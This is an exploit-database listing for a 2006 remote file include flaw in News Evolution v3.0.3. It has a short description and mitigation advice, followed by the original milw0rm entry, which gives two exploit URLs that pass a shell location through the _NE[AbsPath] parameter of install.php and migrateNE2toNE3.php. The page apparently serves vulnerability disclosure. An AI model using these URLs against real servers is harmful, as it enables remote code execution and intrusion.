header-logo
Suggest Exploit
vendor:
News Evolution
by:
ERNE
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: News Evolution
Affected Version From: 3.0.3
Affected Version To: 3.0.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

News Evolution v3.0.3 – Remote File Include Vulnerabilities

News Evolution v3.0.3 is vulnerable to Remote File Include vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute it on the vulnerable server. This can be exploited to execute arbitrary PHP code on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated. Additionally, the application should be configured to only allow the inclusion of files from trusted sources.
Source

Exploit-DB raw data:

# ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----
 
# News Evolution v3.0.3 - Remote File Include Vulnerabilities
 
# site    : http://www.comscripts.com/jump.php?action=script&id=825
 
# Script  :  News Evolution v3.0.3
 
# Credits : ERNE
 
# Contact : erne@ernealizm.com  and irc.gigachat.net #kurdhack
 
# Thanks  : BLaCKWHITE, Blackened, Di_lejyoner
 
# Vulnerable :
 
     http://www.site.com/[path]/install.php?_NE[AbsPath]=[shell]
  
     http://www.site.com/[path]/migrateNE2toNE3.php?_NE[AbsPath]=[shell]

# milw0rm.com [2006-09-07]

Navigation

Suggest Exploit

Services By CQR